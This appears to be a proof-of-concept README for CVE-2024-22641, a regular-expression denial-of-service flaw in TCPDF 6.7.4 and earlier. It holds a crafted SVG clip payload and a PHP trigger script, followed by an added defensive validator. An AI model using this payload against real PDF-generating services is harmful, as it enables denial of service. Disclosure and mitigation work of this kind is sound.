CVE-2024-22641 PoC — TCPDF Security Vulnerability

Associated Vulnerability
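Title: TCPDF Security Vulnerability (CVE-2024-22641)
Description: TCPDF is an open-source library from Tecnick for generating PDF documents and barcodes. TCPDF 6.7.4 and earlier contain a security vulnerability caused by susceptibility to ReDoS (regular expression denial of service) attacks.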
Readme
# CVE-2024-22641

#### Vulnerability Type
Regular expression Denial of Service (ReDoS)

#### Affected Product and Version
TCPDF <= 6.7.4

#### Attack Vector
TCPDF parses an SVG file that contains a crafted payload.

#### Description
TCPDF versions <= 6.7.4 are vulnerable to ReDoS (Regular Expression Denial of Service) when parsing an untrusted SVG file.

#### PoC
```svg
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
```

```php
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

// render the SVG from the PoC above
$pdf->ImageSVG($file='poc.svg');
?>
```
> Note: Calling **preg_last_error()** after the vulnerable line of code shows that the regex exited with **PREG_BACKTRACK_LIMIT_ERROR**.
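
One way to screen untrusted SVG input before it reaches `ImageSVG()`, as an added example that is not part of the original README or of TCPDF: it caps and strictly validates `clip` attributes like the one in the PoC, and fails closed on any PCRE error such as `PREG_BACKTRACK_LIMIT_ERROR`. `MAX_CLIP_LEN`, `CLIP_PATTERN`, `checked_preg_match()` and `screen_svg_clip()` are hypothetical names and values chosen for illustration.

```php
<?php
// Added example, not TCPDF code. MAX_CLIP_LEN and CLIP_PATTERN are assumptions.
const MAX_CLIP_LEN = 64;
// Possessive quantifiers (++, *+) never backtrack, so matching stays linear.
const CLIP_PATTERN = '/^(?:auto|rect\(\s*+[a-z0-9.\-]++(?:[\s,]++[a-z0-9.\-]++){3}\s*+\))$/i';

/** preg_match() that refuses to read an engine failure as "no match". */
function checked_preg_match(string $pattern, string $subject): bool
{
    $result = preg_match($pattern, $subject);
    if ($result === false) {
        // e.g. PREG_BACKTRACK_LIMIT_ERROR: fail closed instead of continuing.
        throw new RuntimeException('PCRE failed, code ' . preg_last_error());
    }
    return $result === 1;
}

/** Returns reasons to reject the SVG; an empty array means it passed. */
function screen_svg_clip(string $svgXml): array
{
    $doc = new DOMDocument();
    // LIBXML_NONET: no network access while parsing untrusted XML.
    if ($svgXml === '' || !@$doc->loadXML($svgXml, LIBXML_NONET)) {
        return ['not well-formed XML'];
    }
    $problems = [];
    foreach ((new DOMXPath($doc))->query('//@clip') as $attr) {
        $value = trim($attr->value);
        if (strlen($value) > MAX_CLIP_LEN) {
            $problems[] = 'clip attribute longer than ' . MAX_CLIP_LEN . ' bytes';
        } elseif (!checked_preg_match(CLIP_PATTERN, $value)) {
            $problems[] = 'clip attribute is not auto or a four-value rect()';
        }
    }
    // Limitation: clip set inside a style="..." attribute is not inspected here.
    return $problems;
}

// Constructed inputs: one benign, one shaped like the PoC above.
$benign = '<svg xmlns="http://www.w3.org/2000/svg"><circle clip="rect(0 10 10 0)"/></svg>';
$hostile = '<svg xmlns="http://www.w3.org/2000/svg"><circle clip="rect('
    . str_repeat('0', 150) . '!)"/></svg>';
foreach (['benign' => $benign, 'hostile' => $hostile] as $name => $svg) {
    $problems = screen_svg_clip($svg);
    echo $name, ': ', $problems ? implode('; ', $problems) : 'ok', PHP_EOL;
}
```

Only pass a file to `ImageSVG()` when `screen_svg_clip()` returns an empty array, and treat the thrown `RuntimeException` as a rejection rather than retrying.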